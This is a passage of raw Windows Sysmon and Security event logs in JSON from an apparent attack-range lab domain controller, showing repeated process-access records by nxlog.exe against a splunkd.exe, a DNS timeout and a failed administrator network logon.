(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:23.512","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4626,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:24.512\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:24.512","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4627,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:25.512\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:25.512","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4628,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:26.513\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:26.513","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4629,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:27.513\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:27.513","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4630,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:28.513\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:28.513","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":4611686018695823360,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1014,"SourceName":"Microsoft-Windows-DNS-Client","ProviderGuid":"{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}","Version":0,"Task":1014,"OpcodeValue":0,"RecordNumber":76862,"ProcessID":1336,"ThreadID":1672,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Name resolution for the name 66.247.192.203.in-addr.arpa. timed out after none of the configured DNS servers responded.","Opcode":"Info","QueryName":"66.247.192.203.in-addr.arpa.","AddressLength":"128","Address":"1700000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000","EventReceivedTime":"2020-08-01 06:54:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9218868437227405312,"EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":4625,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220404,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account failed to log on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Type:\t\t\t3\r\n\r\nAccount For Which Logon Failed:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\tadministrator\r\n\tAccount Domain:\t\t\r\n\r\nFailure Information:\r\n\tFailure Reason:\t\tAn Error occured during Logon.\r\n\tStatus:\t\t\t0xC0000225\r\n\tSub Status:\t\t0x0\r\n\r\nProcess Information:\r\n\tCaller Process ID:\t0x0\r\n\tCaller Process Name:\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t203.192.247.66\r\n\tSource Port:\t\t51818\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\t\r\n\tAuthentication Package:\tNTLM\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\r\n\r\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe Process Information fields indicate which account and process on the system requested the logon.\r\n\r\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-0-0","TargetUserName":"administrator","Status":"0xc0000225","FailureReason":"%%2304","SubStatus":"0x0","LogonType":"3","AuthenticationPackageName":"NTLM","WorkstationName":"-","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"203.192.247.66","IpPort":"51818","EventReceivedTime":"2020-08-01 06:54:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
